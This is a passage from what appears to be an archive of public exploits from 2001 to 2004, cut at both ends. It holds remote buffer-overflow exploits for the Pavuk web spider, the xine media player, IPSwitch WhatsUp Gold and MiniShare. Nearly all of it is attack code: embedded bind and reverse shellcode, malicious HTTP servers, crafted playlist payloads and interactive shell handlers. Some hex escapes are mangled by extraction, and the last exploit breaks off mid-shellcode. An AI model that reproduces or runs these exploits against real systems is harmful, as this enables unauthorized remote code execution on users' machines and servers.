sin.sin_addr = *((struct in_addr *)ht->h_addr);
if ((ht = gethostbyname(argv[3])) == 0){
herror(argv[3]);
exit(1);
}
a_host = *((unsigned long *)ht->h_addr);
a_host^=0x95959595;
sploit[441]= (a_port) & 0xff;
sploit[442]= (a_port >> 8) & 0xff;
sploit[446]= (a_host) & 0xff;
sploit[447]= (a_host >> 8) & 0xff;
sploit[448]= (a_host >> 16) & 0xff;
sploit[449]= (a_host >> 24) & 0xff;
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
perror("socket");
exit(1);
}
printf("\nconnecting... \n");
if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
perror("connect");
exit(1);
}
write(s, sploit, strlen(sploit));
sleep (1);
close (s);
printf("sent... \nyou may need to send a carriage on your listener if the shell doesn't appear.\nhave fun!\n");
exit(0);
}
// [2001-05-08]
80 Pavuk Digest Authentication Buffer Overflow Remote Exploit
/*
* exploit for pavuk web spider - infamous42md AT hotpop DOT com
*
* shouts to mitakeet, skullandcircle, and thanks to matt murphy for making me
* realize a n00bish mistake i made.
*
* this exploit probably deserves a bit of an explanation as it was not exactly
* straight forward. the vulnerable code looks like this, with some comments
* inlined by me:
*/
#if 0
char *http_get_digest_auth_str(auth_digest, method, user, pass, urlp, buf)
http_digest_info *auth_digest;
char *method;
char *user;
char *pass;
url *urlp;
char *buf;
{
/* this is the buffer we bitch slap */
char pom[1024];
char *a1,*a2,*a3;
char *d = url_encode_str(urlp->p.http.document, URL_PATH_UNSAFE);
/* not yet */
sprintf(pom, "%s:%s:%s", user, auth_digest->realm, pass);
a1 = _md5(pom);
sprintf(pom, "%s:%s", method, d);
/* this turns into a 32 byte string */
a2 = _md5(pom);
/*
* this is the point that we overflow the buffer. we control
* auth_digest->nonce, and that is where all of our evil code go. but crap,
* look, the string a2 gets appended to the nonce buffer, that means
* whatever lives above the saved EIP we overwrite is going to get fuxxored
* to. that means the arguments to the function get trashed, usually not a
* problem, but look below at the following sprintf(). those variables get
* used again, so we have to restore them to a sane state.
*/
sprintf(pom, "%s:%s:%s", a1, auth_digest->nonce, a2);
a3 = _md5(pom);
/* crap */
sprintf(buf,
"Digest username=\"%s\", realm=\"%s\", nonce=\"%s\", uri=\"%s\", response=\"%s\"" ,
user, auth_digest->realm, auth_digest->nonce, d, a3);
/* more crap, we need to repair nearly all of the parameters */
if (auth_digest->opaque)
{
strcat(buf, ", opaque=\"");
strcat(buf, auth_digest->opaque);
strcat(buf, "\"");
}
_free(d);
_free(a1);
_free(a2);
_free(a3);
return buf;
}
#endif
/*
* so u can see we can't just overflow and go. we need to recreate at least
* the auth_digest pointer, the user pointer, and the buf pointer. so, the
* strategy is as follows:
*
* + overwrite auth_digest to point into the buffer we control
* + where we point auth_digest must also contain valid pointers as they are
* used as the strings that get printed into buffer.
* + so we point those pointers towards the very end of our buffer. the
* strings they point to should not be so long. our buffer is NULL termed so if
* they point towards the end of it, we know they'll end at a set point.
* + we set the user pointer to the same place as the auth_digest pointer.
* + we set buf to point past the end of our buffer, at some higher address.
* that is where all the other strings get printed to in sprintf() and
* strcat().
* + and that's about it. so our buffer looks like this:
*
* <-------------------|
* ALIGN NOPS SHELL STRING_PTRS RETADDR USER_AND_DIGEST_PTRS BUF_PTRS
* |----------------------------^ |------^
*
* the only arg you pass is the base address of the buffer that we overwrite,
* which lays somewhere on the stack. note this is not the location of our
* original buffer, but the location of the pom variable from above func. and
* you need to be root as we bind to port 80 and pretend to be a webserver.
*
* [[email protected]] ./ps
* Usage: ./ps <base of nonce buffer>
*
* [[email protected]] ./ps 0xbfffdb34
* got a shell
*
* id
* uid=1000(n00b) gid=100(users) groups=100(users)
*
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#define die(x) do{ perror((x)); exit(1); }while(0)
#define SHELL_PORT 7000
#define HTTP_PORT 80
#define BS 0x1000
/* probably don't need all this */
char *reply =
"HTTP/1.1 401 Authorization Required\n"
"Date: Sat, 07 Aug 2004 02:10:07 GMT\n"
"Server: Apache/1.3.27 (Unix) PHP/4.3.1\n"
"WWW-Authenticate: Digest realm=\"time2die\" nonce=\"%s\"\n"
"Status: 401 Not Authorized\n"
"Connection: close\n"
"Content-Type: text/html\r\n\r\n";
/* call them */
char sc[] =
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x 04\x24\x02\x89\xe6"
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\x b0\x01\xcd\x80\x50"
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\x cd\x80\x89\xc5\x6a"
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x 01\x55\x89\xe1\x31"
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x 50\x55\x89\xe1\xb0"
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\x c9\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x 73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x 80";
int conn(struct sockaddr_in *sap)
{
int sock;
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0)
die("socket");
if(connect(sock, (struct sockaddr *)sap, sizeof(*sap)) < 0)
die("connect");
return sock;
}
void shell(struct sockaddr_in *sap)
{
int sock = 0, l = 0;
char buf[BS];
fd_set rfds;
sap->sin_port = htons(SHELL_PORT);
sock = conn(sap);
printf("got a shell\n\n");
FD_ZERO(&rfds);
while (1) {
FD_SET(STDIN_FILENO, &rfds);
FD_SET(sock, &rfds);
if (select(sock + 1, &rfds, NULL, NULL, NULL) < 1)
die("select");
if (FD_ISSET(STDIN_FILENO, &rfds)) {
if ((l = read(0, buf, BS)) <= 0)
die("\n - Connection closed by user\n");
if (write(sock, buf, l) < 1)
die("write");
}
if (FD_ISSET(sock, &rfds)) {
l = read(sock, buf, sizeof(buf));
if (l == 0)
die("\n - Connection terminated.\n");
else if (l < 0)
die("\n - Read failure\n");
if (write(1, buf, l) < 1)
die("write");
}
}
}
int do_listen()
{
int sock = 0, on = 1;
struct sockaddr_in sa;
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(HTTP_PORT);
sa.sin_addr.s_addr = INADDR_ANY;
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0)
die("socket");
if(setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on)) < 0)
die("setsockopt");
if(bind(sock, (struct sockaddr *)&sa, sizeof(sa)) < 0)
die("bind");
if(listen(sock, 1) < 0)
die("listen");
return sock;
}
void sploit(int sock, struct sockaddr_in *sap, u_long nbase)
{
int len = 0, x;
char buf[BS], evil_nonce[BS];
u_long retaddr, ptrs_to_struct, fake_structs, new_buf;
memset(buf, 0, BS), memset(evil_nonce, 0, BS);
/* read the req */
if(recv(sock, buf, BS, 0) < 0)
die("read");
/* build the buffer */
#define ALIGN 3
#define NNOPS 100
#define SHELL_LEN 132
#define PTRS_OFFSET (ALIGN+NNOPS+SHELL_LEN) /* the string pointers */
#define PTRS_LEN 500
#define RET_OFFSET (PTRS_OFFSET+PTRS_LEN)
#define RET_LEN 288
#define PPTRS_OFFSET (RET_OFFSET+RET_LEN) /* the pointers to pointers */
#define PPTRS_LEN 20
#define BUF_OFFSET (PPTRS_OFFSET+PPTRS_LEN) /* the pointer to new buf */
#define BUF_LEN 20
#define TOTAL_LEN (BUF_OFFSET+BUF_LEN)
#define PTRS_LOC 1000 /* where the strings point to */
#define PPTRS_LOC 300 /* offset from base to the string pointers */
#define RET_LOC 50 /* offset of NOP buffer */
fake_structs = nbase + PTRS_LOC;
retaddr = nbase + RET_LOC;
ptrs_to_struct = nbase + PPTRS_LOC;
new_buf = nbase + TOTAL_LEN*2;
/* the NOPS and shellcode */
memset(evil_nonce, 'A', ALIGN);
memset(evil_nonce+ALIGN, 0x90, BS);
memcpy(evil_nonce+NNOPS+ALIGN, sc, SHELL_LEN);
/* the fake pointers point towards end of buffer */
for(x = 0; x < PTRS_LEN-3; x += sizeof(fake_structs))
memcpy(evil_nonce+PTRS_OFFSET+x, &fake_structs, sizeof(fake_structs));
/* the ret addr */
for(x = 0; x < RET_LEN; x += sizeof(retaddr))
memcpy(evil_nonce+RET_OFFSET+x, &retaddr, sizeof(retaddr));
/* the pointers to the fake pointers */
for(x = 0; x < PPTRS_LEN; x+= sizeof(ptrs_to_struct))
memcpy(evil_nonce+PPTRS_OFFSET+x, &ptrs_to_struct, sizeof(ptrs_to_struct));
/* and the new location for buf */
for(x = 0; x < BUF_LEN; x+= sizeof(new_buf))
memcpy(evil_nonce+BUF_OFFSET+x, &new_buf, sizeof(new_buf));
evil_nonce[TOTAL_LEN] = 0;
/* fill in HTTP reply */
len = snprintf(buf, BS-1, reply, evil_nonce);
/* i dont care what u request, you're getting the sploit */
if(send(sock, buf, len, 0) < 0)
die("send");
close(sock);
sleep(1);
shell(sap);
}
int main(int argc, char **argv)
{
int lsock, asock;
u_long nbase = 0;
struct sockaddr_in sa;
pid_t cpid;
socklen_t salen;
if(argc < 2){
fprintf(stderr, "\tUsage: %s <base of nonce buffer>\n", argv[0]);
return EXIT_FAILURE;
}
sscanf(argv[1], "%lx\n", &nbase);
lsock = do_listen();
while(1){
asock = accept(lsock, (struct sockaddr *)&sa, &salen);
if( (cpid = fork()) == 0)
sploit(asock, &sa, nbase);
else if(cpid < 0)
die("fork");
close(asock);
}
return EXIT_SUCCESS;
}
// [2004-08-08]
80 xine 0.99.2 Remote Stack Overflow Exploit
/*
************************************************** ************************************************** *************
$ An open security advisory #6 - Xine vcd MRL input identifier
management overflow
************************************************** ************************************************** *************
1: Bug Researcher: c0ntex[at]open-security.org
2: Bug Released: July 28th 2004
3: Bug Impact Rate: Medium / Hi
4: Bug Scope Rate: Remote / Local
************************************************** ************************************************** *************
$ This advisory and/or proof of concept code must not be used for
commercial gain.
************************************************** ************************************************** *************
Xine - A free video player
http://xinehq.de
"xine is a free multimedia player. It plays back CDs, DVDs, and
VCDs. It also decodes multimedia files like AVI, MOV, WMV, and MP3 from
local disk drives, and displays multimedia streamed over the
Internet. It interprets many of the most common multimedia formats available
- and some of the most uncommon formats, too."
Part 2 in the Media Mayhem saga, a name that was decided as being
aptly fitting for the "Media Player" security audit project that the Open
Security Group website started at the end of May. This project
continues finding remote exploits in popular media players for Windows and
Linux / UNIX derived systems.
Like the excellent Mplayer, Xine is a superb free media player for
Linux. Sadly there is a generic stack based buffer overflow in all versions
of Xine-lib, including Xine-lib-rc5 that allows for local and remote
malicious code execution.
By overflowing the vcd:// input source identifier buffer, it is
possible to modify the instruction pointer with a value that a malicious
attacker
can control. The issue can be replicated in a remote context by
embedding the input source idientifier within a playlist file, such as
an asx.
When a user plays the file, this stack overflow will occur, exploit
code can then be executed with the rights of the user running Xine.
The problem slightly increases due to a usability feature. It does
not have to be an asx extension for exploitation to succeed as Xine will try
to be clever and play any media type found, providing it's valid.
This still means the attack vector MUST include the .asx input
identifier but
it means you can not even trust URL's for .mp3, .mpeg, .mpg or .avi
media. As long as Xine finds a valid media header, it's happy to change
the demuxer reference and play the found media. In this case it's a
playlist file, ".asx", though others should work.
Any of the following demuxors will work when running against the
attached POC server:
xine --no-splash http://sunscreen/opensecurity.asx
xine --no-splash http://sunscreen/opensecurity.mp3
xine --no-splash http://sunscreen/opensecurity.mpg
xine --no-splash http://sunscreen/opensecurity.mpeg
xine --no-splash http://sunscreen/opensecurity.wma
xine --no-splash http://sunscreen/opensecurity.avi
xine --no-splash http://sunscreen/blah.blah
xine --no-splash http://sunscreen/
There are some tricks that may have to be pulled to allow for
successful code execution to work, primarily due to some memory corruption
that happens and opcode destruction. However it is easily defeated
by either jmp'ing over the corrupt few bytes or by placing the shellcode
into the buffer at some known good location.
An example malicious .asx file:
sunscreen$ cat open-security.asx
<asx version = "3.0">
<title>Open Security Media Archive</title>
<author>Brought to you by c0ntex[at]open-security.org</author>
<abstract>
SongList:
Track 1 - Open Security Rock(s) -> SOAD - Chop Suey
Track 2 - Open Security Rock(s) -> Media Mayhem Militia
</abstract>
<entry>
<title>System Of A Down - Chop Suey</title>
<author>c0ntex[at]open-security.org</author>
<copyright>?004</copyright>
<Ref href = "http://sunscreen/SOAD-ChopSuey.mp3"/>
</entry>
<entry>
<title>All your media are belong to us!</title>
<author>c0ntex[at]open-security.org</author>
<copyright>?004</copyright>
<Ref href = "vcd://
????> "/>
</entry>
</asx>
sunscreen$
---
Example POC run:
sunscreen$ gcc -o xinesmine xinesmine.c -lsocket -lnsl
sunscreen$ ./xinesmine -a 0 -p 80
** Xines_Mine - Remote proof of concept example **
[-] Uses .asx header reference to make Xine think it has valid
[-] reference file, then a crafted package is sent to overflow
[-] the vulnerable client && prove remote exploit concept.
[-] c0ntex[at]open-security.org {} http://www.open-security.org
-> Listening for a connection on port 80
[c0ntex@exploited xine]$ ./xine --no-splash
http://sunscreen/opensecurity.asx
This is xine (X11 gui) - a free video player v0.99.2.
(c) 2000-2004 The xine Team.
Playlist file (http://sunscreen/opensecurity.asx) is invalid.
WARN: could not retrieve file info for `image.nrg': No such file or
directory
WARN: init failed
WARN: open(
1?Ph//shh/bin??PS??1?:
File name too long
WARN: could not retrieve file info for `
1?Ph//shh/bin??PS??1?:
File name too long
WARN: init failed
bash-2.05$
Due to the many vulnerabilities being discovered in media players it
is advised not to play any form of music without first verifying its
integrity. It would be worth noting that P2P networks that are
currently sharing music, videos and films tend to be illegal media and as
such void any integrity anyway, I advise highly to stay clear from
IRC and P2P warez.
---
CVS log which details the bug perfectly can be found here:
->
http://sourceforge.net/mailarchive/forum.php?thread_id=5143955&forum_id=11923
Get the latest CVS of Xine-lib from here:
-> http://xinehq.de/index.php/releases
Get the Xine (XSA) advisory from here:
-> http://xinehq.de/index.php/security
Get this original advisory from here:
-> http://www.open-security.org/advisories/advisories.html
---
Xine bug discovered 22nd May 2004
Xine bug research completed 24th May 2004
Xine developers contacted 11th July 2004
Xine bug public release 8th August 2004
cheers
c0ntex[at]open-security.org
http://www.open-security.org
*/
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#ifdef linux
#include <getopt.h>
#endif
#define SUCCESS0
#define FAILURE1
#define BUFFER1044
#define CDATA150
#define JMP200
#define THREAT"xine/1-rc5"
#define XPLOIT_OS Redhat9
#define example(OhNoo) fprintf(stderr, "Usage: ./xines_mine -a
<align_val> -p <port>nn", OhNoo);
void die(char * errtrap);
void banner(void);
int prepsock(int align_stack, int port);
int pkg_send(int clisock_fd, int align_stack, char * pload, char * payload);
int main(int argc, char ** argv);
static char * http[] = {
"HTTP/1.0 200 OKrn",
"Date: Thu, 23 May 2004 12:52:15 GMTrn",
"Server: Xines_Mine Server(Linux)rn",
"MIME-version: 1.0rn",
"Content-Type: audio/x-mpegurlrn",
"Content-Length: 2000rn",
"Connection: closern",
"rn"
};
static char * vcdmuxor[] = {
"<ASX version = "3.0">rn",
"<TITLE>Xines_Mine</TITLE>rn",
"<AUTHOR> c0ntex[at]open-security.org
www.open-security.org</AUTHOR>rn",
"<ENTRY>rn",
"<ref href="vcd://",
""/>rn",
"</ENTRY>rn",
"</ASX>rn",
"rn"
};
static char opcode[] =
"x31xc0x31xdbx50x68x2fx2fx73x68x68x2fx62"
"x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcd"
"x80x31xc0x31xdbxfexc0xcdx80";
void
die(char * errtrap)
{
perror(errtrap);
_exit(FAILURE);
//exit(1);
}
void
banner(void)
{
fprintf(stderr, "n ** Xines_Mine - Remote proof of concept example
**nn");
fprintf(stderr, "[-] Uses .asx header reference to make Xine think it
has validn");
fprintf(stderr, "[-] reference file, then a crafted package is sent to
overflown");
fprintf(stderr, "[-] the vulnerable client && prove remote exploit
concept.n");
fprintf(stderr, "[-] c0ntex[at]open-security.org {}
http://www.open-security.org nn");
}
int
prepsock(int align_stack, int port)
{
unsigned int cl_buf, recv_chk, reuse = 1;
unsigned int clisock_fd;
signed int sock_fd;
static char chk_vuln[CDATA];
static char payload[BUFFER];
struct sockaddr_in victimised, xine;
char *pload = (char *) &opcode;
((sock_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
? die("Could not create socket")
: (setsockopt(sock_fd,SOL_SOCKET,SO_REUSEADDR, &reuse,
sizeof(int)) == -1)
? die("Could not re-use socket")
: memset(&xine, 0, sizeof(xine));
xine.sin_family = AF_INET;
xine.sin_port = htons(port);
xine.sin_addr.s_addr = htonl(INADDR_ANY);
if(bind(sock_fd, (struct sockaddr *)&xine, sizeof(struct
sockaddr)) == -1) {
close(sock_fd); die("Could not bind socket");
}
if(listen(sock_fd, 0) == -1) {
close(sock_fd); die("Could not listen on socket");
}
printf(" -> Listening for a connection on port %dn", port);
cl_buf = sizeof(victimised);
clisock_fd = accept(sock_fd, (struct sockaddr *)&victimised,
&cl_buf);
if(!clisock_fd) {
die("Could not accept connectionn");
}
if(!close(sock_fd)) {
fprintf(stderr, "Could not close socketn");
}
fprintf(stderr, " -> Action: Attaching from host [%s]n",
inet_ntoa(victimised.sin_addr));
fprintf(stderr, " -> Using align [%d] and port [%d]n",
align_stack, port);
//memset(chk_vuln, 0, CDATA);
memset(chk_vuln, 0, sizeof(chk_vuln));
recv_chk = recv(clisock_fd, chk_vuln, sizeof(chk_vuln), 0);
chk_vuln[recv_chk+1] = '';
if((recv_chk == -1) || (recv_chk == 0)) {
fprintf(stderr, "Could not receive data from clientn");
}
if(strstr(chk_vuln, THREAT)) {
fprintf(stderr, " -> Detected vulnerable Xine versionn");
}else{
fprintf(stderr, " -> Detected a non-Xine connection,
end.n");
close(clisock_fd); die("Ending connection, not a Xine clientn");
}
if(pkg_send(clisock_fd, align_stack, pload, payload) == 1) {
fprintf(stderr, "Could not send packagen");
close(clisock_fd); die("Could not send package!n");
}
if(close(clisock_fd) != 0) {
fprintf(stderr, "Could not close socketn");
}
return clisock_fd;
//return SUCCESS;
}
int
pkg_send(int clisock_fd, int align_stack, char * pload, char * payload)
{
unsigned int i = 0;
memset(payload, 0, BUFFER);
for(i = (BUFFER - JMP + align_stack); i < BUFFER; i += 4) {
payload = 0xbc;
payload[i+1] = 0xe7;
payload[i+2] = 0x7f;
payload[i+3] = 0xbf;
}
for (i = 0; i < (BUFFER - 33 - 20); i += 2) {//7 ) {
payload = 0x4d;
payload[i+1] = 0x45;
//payload[i+1] = 0x63;
//payload[i+1] = 0x30;
//payload[i+1] = 0x6e;
//payload[i+1] = 0x74;
//payload[i+1] = 0x65;
//payload[i+1] = 0x78;
//payload[i+1] = 0x90;
}
memcpy(payload + i, pload, strlen(pload));
payload[1045] = 0x00;
fprintf(stderr, " -> Payload size to send is [%4d]n",
strlen(payload));
fprintf(stderr, " -> Sending evil payload to our clientn");
fflush(stderr);
for (i = 0; i < 8; i++)
if(send(clisock_fd, http, strlen(http), 0) == -1) {
close(clisock_fd); die("Could not send HTTP
header");
}fprintf(stderr, "t- Sending valid HTTP header..n");
sleep(1);
for (i = 0; i < 5; i++)
if(send(clisock_fd, vcdmuxor, strlen(vcdmuxor),
0) == -1) {
close(clisock_fd); die("Could not send asx
header");
}fprintf(stderr, "t- Sending starter asx header..n");
sleep(1);
if(send(clisock_fd, payload, strlen(payload), 0) == -1) {
close(clisock_fd); die("Could not send payload");
}fprintf(stderr, "t- Sending payload package..n"); sleep(1);
for (i = 5; i < 9; i++)
if(send(clisock_fd, vcdmuxor, strlen(vcdmuxor),
0) == -1) {
close(clisock_fd); die("Could not send asx
header");
}fprintf(stderr, "t- Sending cleanup asx header..n");
return EXIT_SUCCESS;
}
int
main(int argc, char ** argv)
{
unsigned int align_stack = 0, port = 80;
unsigned int opts;
static char * exploit = NULL;
if(argc < 2) {
goto jumpout;
}banner();
while((opts = getopt(argc, argv, "a:p:")) != -1) {
switch(opts)
{
case 'a':
align_stack = atoi(optarg);
if((align_stack < 0) || (align_stack > 3)) {
goto jumpout;
}
break;
case 'p':
port = atoi(optarg);
if((port < 0) || (port > 65535)) {
goto jumpout;
}
break;
default:
goto jumpout;
break;
}
}
if(prepsock(align_stack, port) == -1) {
fprintf(stderr, "Errorn");
_exit(FAILURE);
} fprintf(stderr, " -> Test completenn");
return EXIT_SUCCESS;
jumpout:
banner();
example(exploit);
return EXIT_FAILURE;
}
// [2004-08-09]
80 IPSwitch WhatsUp Gold 8.03 Remote Buffer Overflow Exploit
#!/usr/bin/perl
# [LoWNOISE] NotmuchG.pl v.1.5
# ================================================
# IPSWITCH WhatsUp Gold ver8.03 Remote Buffer Overflow Exploit
# ================================================
#
# Exploit by ET LoWNOISE Colombia
# et(at)cyberspace.org
# Oct/2004
#
# Tested on WIN2K SP4
#
# The exploit takes control by overwriting the pointer of a Structured
Exception Handler,
# installed by WhatsUP and points to a routine that handles exceptions.
# (http://www.thc.org/papers/Practical-SEH-exploitation.pdf Johnny
Cyberpunk THC)
#
# The overflow string has to be around 4080 in length to generate an
exception that can
# be manipulated by changing the SEH pointer (ret [815]).
#
#
# Bug Discovered by
# iDEFENSE Security Advisory 08.25.04
# http://www.idefense.com/application/poi/display?type=vulnerabilities
#
# Greetz to the midget, the m3 and los parces , the seltiks, p0ch1n,
Ritt3r,Mav, f4lc0n..
use strict;
use IO::Socket::INET;
usage() unless (@ARGV == 2);
my $host = shift(@ARGV);
my $port = shift(@ARGV);
# Bind shellcode port 28876 (HDM, metasploit.org)
my $shellcode =
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\x ea\x52\x8b\x52".
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\x ee\x31\xff\xc1".
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\x ea\x5a\x8b\x5a".
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x 8b\x04\x8b\x01".
"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x 8b\x40\x0c\x8b".
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x 50\x68\x33\x32".
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\x fe\xe8\x90\xff".
"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x 54\x31\xc0\xfe".
"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\x ff\x31\xc0\x50".
"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\x e8\x61\xff\xff".
"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\x fe\xcc\x50\x89".
"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x 42\xff\xff\xff".
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\x ff\xff\x58\x6a".
"\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\x ff\xff\x31\xdb".
"\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x 53\x53\x31\xc0".
"\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x 53\x53\x6a\x44".
"\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x 53\x43\x53\x4b".
"\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\x e2\xfe\xff\xff".
"\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\x e8\xd1\xfe\xff".
"\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\x ff\xff\x31\xc0".
"\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\x ff";
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
PeerPort=>$port);
$socket or die "Cannot connect to the host.\n";
$socket->autoflush(1);
print $socket "POST /_maincfgret.cgi HTTP/1.0\r\n";
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel,
application/msword, application/x-shockwave-flash,
application/vnd.citrix.AdvGWClient-2_2, */*\r\n";
print $socket "Referer:
http://127.0.0.1/NotifyAction.asp?action=AddType&instance=Beeper&end=end\r\n";
print $socket "Accept-Language: en-us\r\nContent-Type:
application/x-www-form-urlencoded\r\nConnection: Keep-Alive\r\n";
print $socket "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1; T312461; .NET CLR 1.1.4322)\r\n";
print $socket "Host: 127.0.0.1\r\nContent-Length: ";
my $cmd ="page=notify&origname=&action=return&type=Beeper&instancename=";
#[-------815-------------] [ret] [-------------4080---------]
#[A.....811...A][jmp] [ret] [nops][shc][E.......E ]
$cmd .= "A"x811; #815 -4
$cmd .= "\xeb\x06\x90\x90"; #jumper <eb + 06> <garbage> jmp to shellcode
#$cmd .= "\xfe\x63\xa1\x71"; #winXP SP1 ws2help.dll
$cmd .= "\xc4\x2a\x02\x75"; #win2k sp0-sp4 ws2help.dll
#$cmd .= "LOWNOISE"; #garbage :D
$cmd .= "\x90"x2080;
$cmd .= $shellcode;
$cmd .= "E"x(2000-length($shellcode)); #mas basura
$cmd .= "&beepernumber=&upcode=0*&downcode=9*&trapcode=6*&end=end";
print $socket length($cmd)."\r\nPragma: no-cache\r\nAuthorization: Basic
YWRtaW46YWRtaW4=\r\n\r\n";
print $socket $cmd."\r\n";
close($socket);
exit(0);
sub usage
{
print "\n[LoWNOISE] IPSWITCH WhatsUp Gold 8.03 Remote fr33 exploit\n";
print "================================================== =\n";
print "\nUsage: NotmuchG.pl [host] [port]\n";
print "[host] Target host\n[port] WhatsUp webserver port\n\n";
print "\n Shell on tcp port 28876.\n\n";
print "ET LoWNOISE 2004\n";
exit(1);
}
# [2004-10-04]
80 MiniShare <= 1.4.1 Remote Buffer Overflow Exploit
/*
MiniShare <= 1.4.1, Remote Buffer Overflow Exploit v0.1.
Bind a shellcode to the port 101.
Full disclosure and exploit
by class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
07 november 2004
Thanx to HDMoore and Metasploit.com for their kickass ASM work.
------------------
WHAT IS MINISHARE
------------------
Homepage - http://minishare.sourceforge.net/
MiniShare is meant to serve anyone who has the need to share files to anyone,
doesn't have a place to store the files on the web,
and does not want or simply does not have the skill
and possibility to set up and maintain a complete HTTP-server software...
--------------
VULNERABILITY
--------------
A simple buffer overflow in the link length, nothing more
read the code for further instructions.
----
FIX
----
Actually none, the vendor is contacted the same day published, 1 hour before you.
As a nice **** to NGSS , iDEFENSE and all others private disclosures
homo crew ainsi que K-OTiK, ki se tap' des keu dans leur "Lab"
lol :->
----
EXTRA
----
Update the JMP ESP if you need. A wrong offset will crash minishare.
Code tested working on MiniShare 1.4.1 and WinXP SP1 English, Win2k SP4 English, WinNT SP6 English
Others MiniShare's versions aren't tested.
Tip: If it crashes for you , try to play with Sleep()...
----
BY
----
class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
who
greets
DiabloHorn [at] www.kd-team.com [&] #kd-team [at] EFnet
*/
#include "winsock2.h"
#include "fstream.h"
#pragma comment(lib, "ws2_32")
//380 bytes, BIND shellcode port 101, XORed 0x88, thanx HDMoore.
char scode[] =
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x 75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\x AC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\x BA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x 89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\x D2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\x D6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x 06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\x AF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x 2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\x BB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\x D9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\x DD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\x DB\xE0\x8A\x88\x88\xED\x01\x68"
